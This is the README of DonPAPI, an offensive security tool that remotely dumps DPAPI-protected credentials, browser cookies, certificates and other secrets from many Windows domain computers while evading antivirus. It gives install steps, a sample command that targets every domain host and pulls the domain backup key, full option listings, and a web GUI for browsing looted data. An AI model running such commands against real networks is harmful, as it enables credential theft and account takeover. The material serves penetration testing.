DonPAPI automates secrets dump remotely on multiple Windows computers, with defense evasion in mind.

Collected credentials:

• Chromium browser Credentials, Cookies and Chrome Refresh Token
• Windows Certificates
• Credential Manager
• Firefox browser Credentials and Cookies
• Mobaxterm Credentials
• MRemoteNg Credentials
• RDC Manager Credentials
• Files on Desktop and and Recent folder
• SCCM Credentials
• Vaults Credentials
• VNC Credentials
• Wifi Credentials

We made a talk in french about DPAPI called DPAPI - Don't Put Administration Passwords In 🇫🇷:

• Slides

• DonPAPI
  • Installation
  • Quick Start
  • Usage
    • collect
      • Authentication
      • Collection
      • OPSEC
      • Recover
      • Keep Collecting
    • gui
      • Web
      • Functionalities
  • Disclaimer
  • Credits

This tool should be install with pipx or in a dedicated virtual environment

pipx install donpapi

or (with latest commits)

pipx install git+https://github.com/login-securite/DonPAPI.git

or (to dev)

git clone git+https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry update
poetry run DonPAPI

pipx install donpapi
donpapi collect -u admin -p 'Password123!' -d domain.local -t ALL --fetch-pvk
donpapi gui

usage: DonPAPI [-h] [-v] [-o DIRNAME] {collect,gui} ...

Dump revelant information on compromised targets without AV detection. Version: 2.0.0

positional arguments:
  {collect,gui}         DonPAPI Action
    collect             Dump secrets on a target list
    gui                 Spawn a Flask webserver to crawl DonPAPI database

options:
  -h, --help            show this help message and exit
  -v                    Verbosity level (-v or -vv)
  -o DIRNAME, --output-directory DIRNAME
                        Output directory. Default is ~/.donpapi/loot/

This action is used to collect secrets on the targets specified in -t.

usage: dpp collect [-h] [--keep-collecting seconds] [--threads Number of threads] [--no-config] [-t TARGET [TARGET ...]] [-d domain.local]
                   [-u username] [-p password] [-H LMHASH:NTHASH] [--no-pass] [-k] [--aesKey hex key] [--laps Administrator] [--dc-ip IP address]
                   [-r /home/user/.donpapi/recover/recover_1718281433] [-c COLLECTORS] [-nr] [--fetch-pvk] [--pvkfile PVKFILE]
                   [--pwdfile PWDFILE] [--ntfile NTFILE] [--mkfile MKFILE]

options:
  -h, --help            show this help message and exit
  --keep-collecting seconds
                        Rerun the attack against all targets after X seconds, X being the value
  --threads Number of threads
                        Number of threads (default: 50)
  --no-config           Do not load donpapi config file (~/.donpapi/donpapi.conf)

authentication:
  -t TARGET [TARGET ...], --target TARGET [TARGET ...]
                        the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, ALL to fetch every
                        computer hostnames from LDAP
  -d domain.local, --domain domain.local
                        Domain
  -u username, --username username
                        Username
  -p password, --password password
                        Password
  -H LMHASH:NTHASH, --hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  --no-pass             don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
                        credentials cannot be found, it will use the ones specified in the command line
  --aesKey hex key      AES key to use for Kerberos Authentication (1128 or 256 bits)
  --laps Administrator  use LAPS to request local admin password. The laps parameter value is the local admin account use to connect
  --dc-ip IP address    IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -r /home/user/.donpapi/recover/recover_1718281433, --recover-file /home/user/.donpapi/recover/recover_1718281433
                        The recover file path. If used, the other parameters will be ignored

attacks:
  -c COLLECTORS, --collectors COLLECTORS
                        Chromium, Certificates, CredMan, Files, Firefox, MobaXterm, MRemoteNG, RDCMan, SCCM, Vaults, VNC, Wifi, All (all
                        previous) (default: All)
  -nr, --no-remoteops   Disable Remote Ops operations (basically no Remote Registry operations, no DPAPI System Credentials)
  --fetch-pvk           Will automatically use domain backup key from database, and if not already dumped, will dump it on a domain controller
  --pvkfile PVKFILE     Pvk file with domain backup key
  --pwdfile PWDFILE     File containing username:password that will be used eventually to decrypt masterkeys
  --ntfile NTFILE       File containing username:nthash that will be used eventually to decrypt masterkeys
  --mkfile MKFILE       File containing {GUID}:SHA1 masterkeys mappings

Authentication works by specifying a domain with --domain, an username with --username, and eventually a password with --password, a hash with --hashes, an AES key with --aesKey or a Kerberos ticket in ccache format with -k (Impacket style). You can also authenticate through LAPS on the computer with --laps and the username of the local LAPS account as the value for this parameter.

By default, DonPAPI will collect:

• Chromium: Chromium browser Credentials, Cookies and Chrome Refresh Token
• Certificates: Windows Certificates
• CredMan: Credential Manager
• Firefox: Firefox browser Credentials and Cookies
• MobaXterm: Mobaxterm Credentials
• MRemoteNg: MRemoteNg Credentials
• RDCMan: RDC Manager Credentials
• Files: Files on Desktop and and Recent folder
• SCCM: SCCM Credentials
• Vaults: Vaults Credentials
• VNC: VNC Credentials
• Wifi: Wifi Credentials

You can specify each one you want to collect with --collectors (SharpHound style). If you use --fetch-pvk, DonPAPI will automatically fetch the Domain Backup Key of the AD domain and use it to decrypt masterkeys. Otherwise, you can bring one with --pvkfile. --pwdfile, --ntfile are used to feed DonPAPI with secrets in order to unlock masterkeys. But if you have freshly decrypted masterkeys, you can use --mkfile.

DonPAPI now supports a configuration file in order to pimp Secretsdump behaviour. This file will be located at ~/.donpapi/donpapi.conf, and by default, it will looks like this:

[secretsdump]
share = C$
remote_filepath = \Users\Default\AppData\Local\Temp
filename_regex = \d{4}-\d{4}-\d{4}-[0-9]{4}
file_extension = .log

DonPAPI supports recover file. Each time you will run a collect command, it will save a recover file of the remaining targets and all the options. By default, the file is located in ~/.donpapi/register/ folder

Sometimes on an internal assessment, you want to go hard on some specific targets and collecting secrets on their computer again and again. Don't do a stupid bash loop, just use --keep-collecting X, X being the seconds you want to wait between each collecting sessions.

Now that you have collected all those secrets, you want to crawl them. DonPAPI allow you to go through all collected secrets with a web GUI. To launch it, use donpapi gui.

usage: DonPAPI gui [-h] [--bind BIND] [--port PORT] [--ssl] [--basic-auth user:password]

options:
  -h, --help            show this help message and exit
  --bind BIND           HTTP Server bind address (default=127.0.0.1)
  --port PORT           HTTP Server port (default=8088)
  --ssl                 Use an encrypted connection
  --basic-auth user:password
                        Set up a basic auth

General

This screen will show you every SAM reused passwords accross all collected computers, dumped scheduled tasks and service account passwords dumped from LSA. You can export all of them as CSV format.

Secrets

This screen will show you every secrets looted with DonPAPI. You can search on multiple elements and exports secrets in CSV

Cookies

This screen will show you every cookies looted with DonPAPI. You can search on multiple elements and exports cookies in CSV, but also copy paste them into JavaScript code to paste it in your browser.

Certificates

This screen will show you every certificates looted with DonPAPI. You can search on multiple elements and exports certificates in CSV, but also if a certificate allow client auth, then clicking on Yes will copy paste a Certipy command to use the certificate.

This tool is for educational and ethical hacking purpose only. Login Sécurité is not responsible for the abuses committed with this tool.

The GUI frontend is developed in Vue3 + Vite.js, and the backend is Python Flask.

By default, it will be exposed at http://127.0.0.1:8088, but you can expose it the way you like, even at https://0.0.0.0:443.

Clicking on a value in the tables will instantly put it in your clipboard.

A Hide Password checkbox is available in the GUI, in order to hide sensitive data in the GUI, perfect for screenshots.

All the credits goes to these great guys for doing the hard research & coding :

• Benjamin Delpy for most of the DPAPI research (always greatly commented, <3 your code)
• All the team working on Impacket (https://github.com/SecureAuthCorp/impacket). Almost everything we do here comes from impacket.
• Alesandro Z & everyone who worked on Lazagne (https://github.com/AlessandroZ/LaZagne/wiki) for the VNC & Firefox modules, and most likely for a lots of other ones in the futur.
• dirkjanm for the GUI idea in Roadtools & every research he ever did. I learned so much on so many subjects thanks to you. <3
• Byt3bl33d3r for CrackMapExec & All the team working on NetExec(lots of inspiration and code comes from CME / NXC projects)
• All the Team at Login Sécurité for their ideas and help in debugging my shitty code (special thanks to @layno & @HackAndDo for that)